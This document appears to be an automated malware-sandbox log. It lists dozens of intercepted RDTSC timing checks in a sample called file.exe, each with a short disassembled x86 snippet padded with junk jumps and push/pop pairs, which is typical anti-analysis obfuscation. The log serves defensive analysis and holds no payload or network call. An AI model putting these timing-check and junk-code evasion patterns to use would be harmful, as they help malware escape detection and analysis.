Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110131C second address: 110133F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08ED2385F6h 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110133F second address: 1101343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110877F second address: 1108783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1108783 second address: 11087B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F08ED2F2E92h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F08ED2F2E95h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11087B3 second address: 11087BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F08ED2385E6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1108920 second address: 110893D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F08ED2F2E8Ch 0x0000000c ja 00007F08ED2F2E86h 0x00000012 jns 00007F08ED2F2E88h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1108C56 second address: 1108C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1108C5C second address: 1108C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1108C60 second address: 1108CD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EAh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jne 00007F08ED2385E6h 0x00000014 jmp 00007F08ED2385F6h 0x00000019 jmp 00007F08ED2385F9h 0x0000001e popad 0x0000001f pushad 0x00000020 jns 00007F08ED2385E6h 0x00000026 jmp 00007F08ED2385F0h 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d push edx 0x0000002e pop edx 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 jnl 00007F08ED2385E6h 0x00000038 jg 00007F08ED2385E6h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1108E5B second address: 1108E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1108E63 second address: 1108E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F08ED2385E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1109239 second address: 1109260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F08ED2F2E97h 0x0000000a pop esi 0x0000000b ja 00007F08ED2F2E90h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1109387 second address: 110938F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110C972 second address: 110C987 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F08ED2F2E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edi 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1111549 second address: 111157D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08ED2385F2h 0x00000009 popad 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F08ED2385F9h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105E4B0 second address: 105E4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1110FA8 second address: 1110FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F08ED2385E6h 0x0000000a popad 0x0000000b jp 00007F08ED2385F2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11112B9 second address: 11112CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F08ED2F2E8Dh 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11112CF second address: 11112D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111E5E7 second address: 111E5F7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F08ED2F2E86h 0x00000008 jno 00007F08ED2F2E86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11215AB second address: 11215C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08ED2385F5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11215C5 second address: 11215CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112175E second address: 112176A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007F08ED2385E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112176A second address: 1121777 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1121777 second address: 112178F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F08ED2385F0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112BA31 second address: 112BA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1132374 second address: 113237A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113BB3F second address: 113BB6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2F2E91h 0x00000009 jmp 00007F08ED2F2E99h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113BB6D second address: 113BB98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F08ED2385F5h 0x00000011 jo 00007F08ED2385EAh 0x00000017 push edi 0x00000018 pop edi 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113BB98 second address: 113BBA2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F08ED2F2E8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113BBA2 second address: 113BBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F08ED2385ECh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A36E second address: 113A3A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E98h 0x00000007 jmp 00007F08ED2F2E94h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A50D second address: 113A511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A848 second address: 113A866 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F08ED2F2E97h 0x00000008 pop esi 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113AA07 second address: 113AA16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F08ED2385E6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113ACBB second address: 113ACC5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113ACC5 second address: 113ACCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F08ED2385E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113AE8C second address: 113AE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114A0BF second address: 114A0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1153559 second address: 1153571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08ED2F2E8Ah 0x00000009 popad 0x0000000a push ecx 0x0000000b jns 00007F08ED2F2E86h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114DE6C second address: 114DE8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385ECh 0x00000007 jc 00007F08ED2385E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F08ED2385E6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114DE8A second address: 114DE8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1160D6B second address: 1160D7A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jng 00007F08ED2385E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1160D7A second address: 1160D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F08ED2F2E98h 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1160D9B second address: 1160DA9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007F08ED2385E6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1178D9B second address: 1178DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1178DA1 second address: 1178DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117905A second address: 1179060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1179060 second address: 1179067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1179067 second address: 11790BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 jnl 00007F08ED2F2E8Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F08ED2F2E93h 0x00000016 jno 00007F08ED2F2E86h 0x0000001c jmp 00007F08ED2F2E92h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F08ED2F2E8Dh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11790BB second address: 11790DA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F08ED2385E6h 0x00000008 jmp 00007F08ED2385F5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11796C5 second address: 11796D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnp 00007F08ED2F2E8Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117CB22 second address: 117CB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117CB26 second address: 117CB4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F08ED2F2E92h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117CB4D second address: 117CB68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F08ED2385EAh 0x0000000a jng 00007F08ED2385E6h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117F6A7 second address: 117F6D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F08ED2F2E8Fh 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117F761 second address: 117F76B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117F76B second address: 117F7D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 jc 00007F08ED2F2E97h 0x0000000f pop edi 0x00000010 nop 0x00000011 add dword ptr [ebp+122D1E38h], edx 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F08ED2F2E88h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D2D67h], edi 0x00000039 movsx edx, si 0x0000003c call 00007F08ED2F2E89h 0x00000041 push ebx 0x00000042 jns 00007F08ED2F2E88h 0x00000048 pop ebx 0x00000049 push eax 0x0000004a pushad 0x0000004b push edi 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117F7D2 second address: 117F7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117F7DB second address: 117F801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117F801 second address: 117F805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117FAD1 second address: 117FB25 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F08ED2F2E92h 0x0000000f push dword ptr [ebp+122D1E24h] 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F08ED2F2E88h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f mov edx, ecx 0x00000031 push 9DDA0500h 0x00000036 jng 00007F08ED2F2E8Eh 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180E27 second address: 1180E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180E33 second address: 1180E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180E37 second address: 1180E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180E3F second address: 1180E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E97h 0x00000007 jmp 00007F08ED2F2E8Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edx 0x00000010 jmp 00007F08ED2F2E8Dh 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180E7A second address: 1180E88 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F08ED2385E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690E62 second address: 5690E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690E66 second address: 5690E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690E6A second address: 5690E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690E70 second address: 5690E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690E76 second address: 5690E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E0008 second address: 56E000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E000C second address: 56E0027 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E0027 second address: 56E0085 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2385EFh 0x00000009 or si, B2EEh 0x0000000e jmp 00007F08ED2385F9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F08ED2385F0h 0x0000001a and cx, 2A68h 0x0000001f jmp 00007F08ED2385EBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E0085 second address: 56E0089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E0089 second address: 56E008D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E008D second address: 56E0093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670129 second address: 567012D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567012D second address: 5670136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670136 second address: 567018D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007F08ED2385ECh 0x0000000e jmp 00007F08ED2385F5h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F08ED2385F0h 0x0000001a and esi, 26479B78h 0x00000020 jmp 00007F08ED2385EBh 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567018D second address: 5670191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670191 second address: 5670197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670197 second address: 56701AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56701AE second address: 56701B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56701B2 second address: 56701B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56701B8 second address: 56701BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56701BE second address: 5670207 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F08ED2F2E8Fh 0x00000013 pushfd 0x00000014 jmp 00007F08ED2F2E98h 0x00000019 and esi, 03417A98h 0x0000001f jmp 00007F08ED2F2E8Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670207 second address: 5670236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F08ED2385EDh 0x00000013 rdtsc
